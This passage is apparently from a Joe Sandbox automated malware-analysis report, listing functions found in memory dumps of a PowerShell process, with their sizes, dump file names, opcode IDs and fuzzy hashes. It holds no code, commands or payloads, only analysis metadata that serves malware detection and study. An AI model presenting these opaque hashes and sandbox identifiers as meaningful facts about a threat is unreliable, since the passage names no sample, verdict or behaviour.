                                                • Instruction Fuzzy Hash: 3341D270B053949FCB02DB68E45499DBFF2EF8A210B0A419AF545DB362CA349C0ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08675728 Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6fa90397692bd76d4eb5033292e0f489a79e237960efc29685fdc4c2c7d2e2f3
                                                • Instruction ID: c74596b57501aa823bd947f4cdfb2bee7557b9578741e23371b56974ccb30000
                                                • Opcode Fuzzy Hash: 6fa90397692bd76d4eb5033292e0f489a79e237960efc29685fdc4c2c7d2e2f3
                                                • Instruction Fuzzy Hash: 4A418A30B00620CFEB248B35949C63E37E6EB89612F5654EED017CAB96DF349846CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FA240 Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5190ebc33871141d3985416ddffdcfaa593a89d1404118297e50799d0ae6534f
                                                • Instruction ID: 7a67504b239769d0a6153ef03a42b156c995beb03c7beede168715e5d6f56529
                                                • Opcode Fuzzy Hash: 5190ebc33871141d3985416ddffdcfaa593a89d1404118297e50799d0ae6534f
                                                • Instruction Fuzzy Hash: D541E230B042158BCB14DBBAD4646AEF7A6EF88219F04883DD606AB395DB35DC05CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08636470 Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46b74932644d4bd06702266fc9b3ed2269bded10ebb22b62a8d6322508065198
                                                • Instruction ID: cf00682334658edf91d582b660b142e7acd9b7162c75c827a6ad58b8e9ab26da
                                                • Opcode Fuzzy Hash: 46b74932644d4bd06702266fc9b3ed2269bded10ebb22b62a8d6322508065198
                                                • Instruction Fuzzy Hash: 72317275F002199FCB44DB68C890AAEB7F6EF89315F168069D409EB351DB34EC06CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FFDF0 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc3e64809f28657c9a5d5b6a3a43bfa2548207661e3559fc607bc2779b0eb97c
                                                • Instruction ID: 74db038572004c5191e187d956a1d3579f02cdd2004baa50f538f2b763ed1f19
                                                • Opcode Fuzzy Hash: cc3e64809f28657c9a5d5b6a3a43bfa2548207661e3559fc607bc2779b0eb97c
                                                • Instruction Fuzzy Hash: 4D414975A007059FC724DF69C48099EBBF2EF89314B258A6DE106AB361DF70AC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FA5CD Relevance: .1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd5ce443ef9bf6705f0f10a06c6cea5c96452fe6935e2b889589f77853e93f50
                                                • Instruction ID: 910fa48671f7934e78b523dbdbcc63c502447ad859acadd42dea302df09d767e
                                                • Opcode Fuzzy Hash: bd5ce443ef9bf6705f0f10a06c6cea5c96452fe6935e2b889589f77853e93f50
                                                • Instruction Fuzzy Hash: 07412E30A00219CFDB24DFA6D458B6EFBB6EF4430AF108428D61A9B759DB34D846CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FBC8C Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f904e99ae6afad56f4049b15e618b82c5e669b739c7de257fc92642be915c20
                                                • Instruction ID: 925a3a7da298c234e8c05263c7d0f09d38d363830beb6ff22949b61562ce5d9c
                                                • Opcode Fuzzy Hash: 8f904e99ae6afad56f4049b15e618b82c5e669b739c7de257fc92642be915c20
                                                • Instruction Fuzzy Hash: 6A31BD307042448FCB15DB75D890BAE77A6EB89210F148879D54ADB396CF389D46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863F838 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2638bc5287112d4b2071cb0259e5066596f37eea04bb72f8078805d117b42e02
                                                • Instruction ID: 613696647a408899e03e22ba2fe61114a812a08825e810fb1d5d6d0f4867dc52
                                                • Opcode Fuzzy Hash: 2638bc5287112d4b2071cb0259e5066596f37eea04bb72f8078805d117b42e02
                                                • Instruction Fuzzy Hash: DB31D235B00605ABC714DF75D850AAEBBA6FFC5221F218629D8298B7C0EF34DD06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863F150 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c1fefae53911d1a910853454f5dabe0e33c435f65fcb5dc85b1e49a2079ed78
                                                • Instruction ID: 4693ae7a8522df79dc17da1a723f2d8f002cab57c4f519d40ed7bd41d65899f3
                                                • Opcode Fuzzy Hash: 9c1fefae53911d1a910853454f5dabe0e33c435f65fcb5dc85b1e49a2079ed78
                                                • Instruction Fuzzy Hash: 5D31BF35B00211DFDB24CFB5E840AAAB7B9FF88316F14896ED55983741DB31E856CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08636480 Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c664ec230f903d8cd6431ebef77d439c8a5c2659f199f3b4d64aec968a4b0a45
                                                • Instruction ID: a106431409c5b8ae1c898457cd65d5216d6fcdc0807af2d14d1c9cff4da45241
                                                • Opcode Fuzzy Hash: c664ec230f903d8cd6431ebef77d439c8a5c2659f199f3b4d64aec968a4b0a45
                                                • Instruction Fuzzy Hash: F8315E75F002199FCB44DF68C990AAEB7F6EF88215F168069D40ADB351DB35EC01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08631EC8 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae4948645884259f7540a843944b1508de73fd1318f1e437365690b5b0922e95
                                                • Instruction ID: db05cab0181f57f0ae4d2575c9759eb2b743f337e7bf8553a1c23d6ffd6261af
                                                • Opcode Fuzzy Hash: ae4948645884259f7540a843944b1508de73fd1318f1e437365690b5b0922e95
                                                • Instruction Fuzzy Hash: C4313934A00219CFDB08DF64C594ADEB7B2FF88305F158568E405AB3A4DB74AC46CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08638F45 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e949518e5a44a1100c81a6faca1e3abec1b830accc11279009729d6d2265e2b
                                                • Instruction ID: 53a47f18a7768e38318e0c807c2ea0c98669f7656e9814891a2b6b38d261d235
                                                • Opcode Fuzzy Hash: 5e949518e5a44a1100c81a6faca1e3abec1b830accc11279009729d6d2265e2b
                                                • Instruction Fuzzy Hash: 9D313A34B012088FDB14DBB8C458BEEBBB2EF88319F118429D416A7391DB71AC46CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FD4F4 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f368a3a27c9e5a8bfeb3f200af95978cb9123f7a7d5a451383647f5e4285c2b
                                                • Instruction ID: caa98224ea30668ed558e1bd10eb3f7a1804942365cc9aa06da2fbfabe866ccc
                                                • Opcode Fuzzy Hash: 5f368a3a27c9e5a8bfeb3f200af95978cb9123f7a7d5a451383647f5e4285c2b
                                                • Instruction Fuzzy Hash: BB31D674A01208CFCB15DFA9C488A9DBBB6FF4930AF108469E5099B766DB35EC81CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863F988 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b82e7199bfc6e45ef5194dc4e206f5374c5e95ddd0eb292fb4064de24f71257
                                                • Instruction ID: 572148e31ade94eb2afa2816de43b2e423bae4ea26c1a9d5a39515c116bf0ef9
                                                • Opcode Fuzzy Hash: 6b82e7199bfc6e45ef5194dc4e206f5374c5e95ddd0eb292fb4064de24f71257
                                                • Instruction Fuzzy Hash: 902166397013549FC7149B75A8949AEBBABEFC5221705847DE90ACB362CE34CC06C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08670ACF Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc4dee1c45350d16910b98e1d1bfc9be4b19c09d059f59ccdedee71db3583c67
                                                • Instruction ID: ed7830298ce1c79feb39d4c87267fcec51ae6cc006e72726a3253acf4c18fc6f
                                                • Opcode Fuzzy Hash: bc4dee1c45350d16910b98e1d1bfc9be4b19c09d059f59ccdedee71db3583c67
                                                • Instruction Fuzzy Hash: 1B314D39A00618DFCB14DBA8D881D9DB7F2FF49715B168159E505EB361CB31EC02CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08670AC8 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6418003503ea5514875821cab9466d16878348deaab9e1f9bc8913e101171cc0
                                                • Instruction ID: ed7830298ce1c79feb39d4c87267fcec51ae6cc006e72726a3253acf4c18fc6f
                                                • Opcode Fuzzy Hash: 6418003503ea5514875821cab9466d16878348deaab9e1f9bc8913e101171cc0
                                                • Instruction Fuzzy Hash: 1B314D39A00618DFCB14DBA8D881D9DB7F2FF49715B168159E505EB361CB31EC02CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08637BD0 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86a22e85dc74015d1ecde1467a242c4bdd0d8ea4f4bcbbbbfa4aeed10d9c9c50
                                                • Instruction ID: d17802ab68db4619d49c9bc469ef6d89f26b183ed3a9ce81441af1594ab742ee
                                                • Opcode Fuzzy Hash: 86a22e85dc74015d1ecde1467a242c4bdd0d8ea4f4bcbbbbfa4aeed10d9c9c50
                                                • Instruction Fuzzy Hash: 99318B70B002459FD7289B74D498BEEBBB6AB88315F19407DE006EB791DB31AC45CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086326A8 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0998fde8a8c63bdf58c5d67a66c0a1892b3e6317c822e4f38f89478c05b68bb
                                                • Instruction ID: cfd7403767c7a77dac3b5c6ac5e1a1319add6440efbe29bc48ff5e40daa8813c
                                                • Opcode Fuzzy Hash: b0998fde8a8c63bdf58c5d67a66c0a1892b3e6317c822e4f38f89478c05b68bb
                                                • Instruction Fuzzy Hash: BE2192363002605FD700DB69E884C5ABBA6FFCA676715807AE605CB361DB22EC19C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08670AD6 Relevance: .1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b9bea5a57a22a0f05dfafc7302989ccb34f8f65fafbb537d4f9fa559f6cd6eb
                                                • Instruction ID: 5dc595132026efe0e515f544b9e3c795c78bf48fcfd30d9847d7781ff0b3f640
                                                • Opcode Fuzzy Hash: 0b9bea5a57a22a0f05dfafc7302989ccb34f8f65fafbb537d4f9fa559f6cd6eb
                                                • Instruction Fuzzy Hash: 29314D39A00614DFCB14DBA8D881D9DB7F2FF49715B168159E505EB361CB31EC01CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863A3C8 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40420334507f1e3da0462c4897b43725d7c0497a6e1e3a1a73ff6ea19205a052
                                                • Instruction ID: 5000b5976d024be81063bf1ef25055de8ec88722306cb45193aa489d5e0b395c
                                                • Opcode Fuzzy Hash: 40420334507f1e3da0462c4897b43725d7c0497a6e1e3a1a73ff6ea19205a052
                                                • Instruction Fuzzy Hash: C321F92260E3B06FC712977E98556E73FB4DF83256B0A409BF5C1CB2A2D519C909C365
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F81B8 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cbf3c51a0813678fb4d69687abda35a18d29185571aab301bc290ec244bee652
                                                • Instruction ID: 28897e76f982c09003fcef4ffe04a6b0e8c2e859f42246999d2af9558901196a
                                                • Opcode Fuzzy Hash: cbf3c51a0813678fb4d69687abda35a18d29185571aab301bc290ec244bee652
                                                • Instruction Fuzzy Hash: CE11B7317092944FCB1597F968142EE7BE98FC2122F1801FBD549C7282DE748E4587A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08637BE0 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61b4725315802e769bfd64ac7f99ef0086794a99fd964f73f7cf25ce3ab271a7
                                                • Instruction ID: a4d0f2f9d84c0112b2787dde9950df971005f5d2e53ee1bec3eca8e0483b895a
                                                • Opcode Fuzzy Hash: 61b4725315802e769bfd64ac7f99ef0086794a99fd964f73f7cf25ce3ab271a7
                                                • Instruction Fuzzy Hash: 6C315970B002169FD7289B64D498BAEBBF6AB88316F15407CE406EB790DF75AC41CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08639981 Relevance: .1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a81facf747a2bd6721972fdc231b5cef53e2c1549649fb1a59ad432b2daadc37
                                                • Instruction ID: 8e584cbc2d51e8ce32415fd7f3624e717942e492bc60b4e81d7bdf4b4e4f4369
                                                • Opcode Fuzzy Hash: a81facf747a2bd6721972fdc231b5cef53e2c1549649fb1a59ad432b2daadc37
                                                • Instruction Fuzzy Hash: 81219C74A043099FCB11DF68D8819DEBBF2FF89300B014A6AE545EB751D735AD0ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863ADC8 Relevance: .1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 913b87493ac99cbd3b0134f1a58a1a51f95ac1bf11da8efab306a3080f90b4f4
                                                • Instruction ID: 98a2e36290d37cc4daf79701ef25a2a37675368f7a361f43c3d6992fe8273e76
                                                • Opcode Fuzzy Hash: 913b87493ac99cbd3b0134f1a58a1a51f95ac1bf11da8efab306a3080f90b4f4
                                                • Instruction Fuzzy Hash: 9321A734600B15CBD724DFA4D4A476FB7A7EBC0626F02892CD10A4B741CF78AC4A9BD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863A9A1 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25a37e0b4962c45f675c250ee9137d68d6e621a426689bbf110bb91219bf11a0
                                                • Instruction ID: 27bc9356395364864b08e0ba08fa07a9c6001889095e01ea1318dbfc398d62a2
                                                • Opcode Fuzzy Hash: 25a37e0b4962c45f675c250ee9137d68d6e621a426689bbf110bb91219bf11a0
                                                • Instruction Fuzzy Hash: 5E219D756007459FC710CB28D880E96BBF2FF89310F158699E589DB392D670FC06CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08633CB4 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40c9b6400a3b580905b8b05039a9e95cc9ea0517ab5e50b86f201021fc5a359e
                                                • Instruction ID: 37f7e374ec5b66c2598daf0186dbdebd73fbde3416526f6cb6719618c946a76b
                                                • Opcode Fuzzy Hash: 40c9b6400a3b580905b8b05039a9e95cc9ea0517ab5e50b86f201021fc5a359e
                                                • Instruction Fuzzy Hash: 91311978A05204DFD719DF68D598B5DBBF2EF48315F1A8098E8159B3A1CB74EC81CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08638FD8 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0cbc569ff2a848cba21a78041e84713ec3b67bad495074b136276512194c792
                                                • Instruction ID: bc659f338cca9cdcf37f8e50393b8e9905c21e01037262463f7a605824a1a299
                                                • Opcode Fuzzy Hash: f0cbc569ff2a848cba21a78041e84713ec3b67bad495074b136276512194c792
                                                • Instruction Fuzzy Hash: AF214A34B002089FD714DBB8C458BADBBB2EF89315F118069E412AB391CB759C46CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08632428 Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e7d32381ec6b4fcb686e14986c3442e41dbaecafab202c709893cbfbfaaa694
                                                • Instruction ID: d64f984c912634b55de37c00b8aaa6c5b930c2f2aea1f92b0d58b7dc393dd950
                                                • Opcode Fuzzy Hash: 6e7d32381ec6b4fcb686e14986c3442e41dbaecafab202c709893cbfbfaaa694
                                                • Instruction Fuzzy Hash: B6118170F002298FCB15DF79D5502EEBBF6AF88617F11403AC945E7300EB358A068B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086385DA Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eedd1226b0b7242c3eff8fef669ee90089ef97f6993863511d5c7851d1221dc7
                                                • Instruction ID: 05623ee45feecb469dcdb52984610bbe6e81d0766ba7bd316ea9ff2350963b43
                                                • Opcode Fuzzy Hash: eedd1226b0b7242c3eff8fef669ee90089ef97f6993863511d5c7851d1221dc7
                                                • Instruction Fuzzy Hash: 74216D316002548FDB189B64D928BEE7BF5EB89712F25407AE506EB390DF719D00CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086709D0 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0082b11aa60891a845422d8596c9ba2888a098dae8a1bcb62f1fd60d3992bc43
                                                • Instruction ID: e35e0d79ceb95c731569c75fdd782bb35a487a648a4e9d84901ebbbcd1cffa69
                                                • Opcode Fuzzy Hash: 0082b11aa60891a845422d8596c9ba2888a098dae8a1bcb62f1fd60d3992bc43
                                                • Instruction Fuzzy Hash: 85216734D00649CFCB00DFA8C481AEDBBF2BF88319F068969D505EB210D7359906CFA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08638809 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22df6867b5e4a94595e30d74bcca07749bab5aff48261861058b421f82a3b31d
                                                • Instruction ID: 652fe435f44cb1b12ccff0aec12ac7d1b6c5f37f93ab0decd7146acde303ac43
                                                • Opcode Fuzzy Hash: 22df6867b5e4a94595e30d74bcca07749bab5aff48261861058b421f82a3b31d
                                                • Instruction Fuzzy Hash: 5B114F75E002089FCB14DFA9D8809EEBBF6FB8C210F14802AE905E7350DB359D169FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086731AE Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea629b311f29b2e22a688e0c457dd7cc5a153a36fe6195af6c4a67ccd11866b6
                                                • Instruction ID: b9554595258ddd7b17f99da2c234be49de6ffc6af640bcabecafbb10fa2a8d19
                                                • Opcode Fuzzy Hash: ea629b311f29b2e22a688e0c457dd7cc5a153a36fe6195af6c4a67ccd11866b6
                                                • Instruction Fuzzy Hash: 8C11E5327042245FD324D6B9E8447BFB7EAEBC5366F15813ED109D7781CA759C4187A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08633C63 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
